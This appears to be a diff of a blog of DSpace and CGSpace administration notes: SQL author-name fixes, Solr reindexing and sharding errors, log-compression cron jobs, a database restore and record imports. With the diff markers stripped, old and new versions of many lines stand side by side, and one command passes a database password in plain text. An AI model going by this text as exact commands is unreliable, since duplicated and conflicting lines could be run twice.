<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b2f7603d-2fb5-4018-923a-c4ec8d85b3bb&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;;
UPDATE 43
</code></pre><ul>
<li>Apparently we also need to normalize Phil Thornton&rsquo;s names to <code>Thornton, Philip K.</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@ -506,7 +506,7 @@ UPDATE 43
</code></pre><ul>
<li>Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
UPDATE 362
</code></pre><ul>
<li>It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)</li>
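<li>In practice that ordering is just the following (a sketch; install path assumed):</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace index-authority
$ [dspace]/bin/dspace index-discovery -b
</code></pre>
<ul>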
@ -520,8 +520,8 @@ UPDATE 362
<li>Set PostgreSQL&rsquo;s <code>shared_buffers</code> on CGSpace to 10% of system RAM (1200MB)</li>
<li>Run the following author corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;34df639a-42d8-4867-a3f2-1892075fcb3f&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39; or authority=&#39;021cd183-946b-42bb-964e-522ebff02993&#39;;
dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
</code></pre><ul>
<li>The authority IDs were different than when I was looking a few days ago, so I had to adjust them here</li>
</ul>
@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
<li>Removing the duplicates in OpenRefine and uploading a CSV to DSpace says &ldquo;no changes detected&rdquo;</li>
<li>Seems like the only way to sort of clean these up would be to start in SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Center for Tropical Agriculture&#39;;
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
UPDATE 1693
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, text_value=&#39;International Center for Tropical Agriculture&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%CIAT%&#39;;
UPDATE 35
</code></pre><ul>
<li>Work on article for KM4Dev journal</li>
@ -577,14 +577,14 @@ UPDATE 35
<li>So basically, new cron jobs for logs should look something like this:</li>
<li>Find any file named <code>*.log*</code> that isn&rsquo;t <code>dspace.log*</code>, isn&rsquo;t already zipped, and is older than one day, and zip it:</li>
</ul>
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &quot;.*\.log.*&quot; ! -iregex &quot;.*dspace\.log.*&quot; ! -iregex &quot;.*\.(gz|lrz|lzo|xz)&quot; ! -newermt &quot;Yesterday&quot; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*&#34; ! -iregex &#34;.*dspace\.log.*&#34; ! -iregex &#34;.*\.(gz|lrz|lzo|xz)&#34; ! -newermt &#34;Yesterday&#34; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
</code></pre><ul>
<li>Since there is <code>xzgrep</code> and <code>xzless</code> we can actually just zip them after one day, why not?!</li>
<li>We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that</li>
<li>I use <code>schedtool -B</code> and <code>ionice -c2 -n7</code> to set the CPU scheduling to <code>SCHED_BATCH</code> and the IO to best effort, which should, in theory, impact important system processes like Tomcat and PostgreSQL less</li>
<li>When the tasks are running you can see that the policies do apply:</li>
</ul>
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}') &amp;&amp; ionice -p $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}')
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;) &amp;&amp; ionice -p $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;)
PID 17049: PRIO 0, POLICY B: SCHED_BATCH , NICE 0, AFFINITY 0xf
best-effort: prio 7
</code></pre><ul>
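<li>A companion cron job could then delete the zipped logs after two weeks, something like this sketch (assuming GNU find&rsquo;s date parsing):</li>
</ul>
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*\.xz&#34; ! -newermt &#34;2 weeks ago&#34; -delete
</code></pre>
<ul>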
@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
<li>None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then</li>
<li>Update some names and authorities in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;5ff35043-942e-4d0a-b377-4daed6e3c1a3&#39;, confidence=600, text_value=&#39;Duncan, Alan&#39; where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*Duncan,? A.*&#39;;
UPDATE 204
dspace=# update metadatavalue set authority=&#39;46804b53-ea30-4a85-9ccf-b79a35816fa9&#39;, confidence=600, text_value=&#39;Mekonnen, Kindu&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Mekonnen, K%&#39;;
UPDATE 89
dspace=# update metadatavalue set authority=&#39;f840da02-26e7-4a74-b7ba-3e2b723f3684&#39;, confidence=600, text_value=&#39;Lukuyu, Ben A.&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Lukuyu, B%&#39;;
UPDATE 140
</code></pre><ul>
<li>Generated a new UUID for Ben using <code>uuidgen | tr [A-Z] [a-z]</code> as the one in Solr had his ORCID but the name format was incorrect</li>
@ -716,9 +716,9 @@ OCSP Response Data:
# su - postgres
$ dropdb cgspace
$ createdb -O cgspace --encoding=UNICODE cgspace
$ psql cgspace -c &#39;alter user cgspace createuser;&#39;
$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
$ psql cgspace -c &#39;alter user cgspace nocreateuser;&#39;
$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
$ vacuumdb cgspace
$ psql cgspace

View File

@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
I tested on DSpace Test as well and it doesn&rsquo;t work there either
I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<ul>
<li>I tried to shard my local dev instance and it fails the same way:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace stats-util -s
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace stats-util -s
Moving: 9318 into core statistics-2016
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Despite failing instantly, a <code>statistics-2016</code> directory was created, but it only has a data dir (no conf)</li>
<li>The Tomcat access logs show more:</li>
</ul>
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabi
n&amp;version=2 HTTP/1.1&quot; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&quot; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update HTTP/1.1&quot; 200 40
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin
&amp;version=2 HTTP/1.1&#34; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&#34; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update HTTP/1.1&#34; 200 40
</code></pre><ul>
<li>Very interesting&hellip; it creates the core and then fails somehow</li>
</ul>
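<ul>
<li>A quick way to inspect the newly created core by hand is the cores STATUS endpoint seen in the log above (a sketch; the Solr host and port are assumptions):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/admin/cores?action=STATUS&amp;core=statistics-2016&#39;
</code></pre>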
@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help</li>
<li>For example, this shows 186 mappings for the item, the first three of which are real:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80596';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80596&#39;;
</code></pre><ul>
<li>Then I deleted the others:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
</code></pre><ul>
<li>And in the item view it now shows the correct mappings</li>
<li>I will have to ask the DSpace people if this is a valid approach</li>
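<li>As a sanity check, counting the mappings again should now return only the three real ones:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(*) from collection2item where item_id = &#39;80596&#39;;
</code></pre><ul>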
@ -224,19 +224,19 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Error in <code>fix-metadata-values.py</code> when it tries to print the value for Entwicklung &amp; Ländlicher Raum:</li>
</ul>
<pre tabindex="0"><code>Traceback (most recent call last):
File &quot;./fix-metadata-values.py&quot;, line 80, in &lt;module&gt;
print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
File &#34;./fix-metadata-values.py&#34;, line 80, in &lt;module&gt;
print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0]))
UnicodeEncodeError: &#39;ascii&#39; codec can&#39;t encode character u&#39;\xe4&#39; in position 15: ordinal not in range(128)
</code></pre><ul>
<li>Seems we need to encode as UTF-8 before printing to screen, ie:</li>
</ul>
<pre tabindex="0"><code>print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0].encode('utf-8')))
<pre tabindex="0"><code>print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0].encode(&#39;utf-8&#39;)))
</code></pre><ul>
<li>See: <a href="http://stackoverflow.com/a/36427358/487333">http://stackoverflow.com/a/36427358/487333</a></li>
<li>I&rsquo;m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database&hellip; I&rsquo;ve never had this issue before</li>
<li>Now back to cleaning up some journal titles so we can make the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now get the top 500 journal titles:</li>
</ul>
@ -255,9 +255,9 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
<li>Fix the two items Maria found with duplicate mappings with this script:</li>
</ul>
<pre tabindex="0"><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
delete from collection2item where id = '91082';
delete from collection2item where id = &#39;91082&#39;;
</code></pre><h2 id="2017-01-17">2017-01-17</h2>
<ul>
<li>Helping clean up some file names in the 232 CIAT records that Sisay worked on last week</li>
@ -266,15 +266,15 @@ delete from collection2item where id = '91082';
<li>And the file names don&rsquo;t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore</li>
<li>Seems like the only ones I should replace are the <code>'</code> apostrophe characters, as <code>%27</code>:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,'%27')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;%27&#39;)
</code></pre><ul>
<li>Add the item&rsquo;s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test importing of the new CIAT records (actually there are 232, not 234):</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><ul>
<li>Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB</li>
<li>These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without compromising the quality too much:</li>
@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>In testing a random sample of CIAT&rsquo;s PDFs for compressibility, it looks like all of these methods generally increase the file size so we will just import them as they are</li>
<li>Import 232 CIAT records into CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><h2 id="2017-01-22">2017-01-22</h2>
<ul>
<li>Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel&rsquo;s CSV exporter)</li>
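<li>A quick way to spot Excel&rsquo;s stray carriage returns before importing is to count the lines that contain them (a sketch; the file name is an example):</li>
</ul>
<pre tabindex="0"><code>$ grep -c $&#39;\r&#39; records.csv
</code></pre><ul>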
@ -300,7 +300,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>I merged Atmire&rsquo;s pull request into the development branch so they can deploy it on DSpace Test</li>
<li>Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):</li>
</ul>
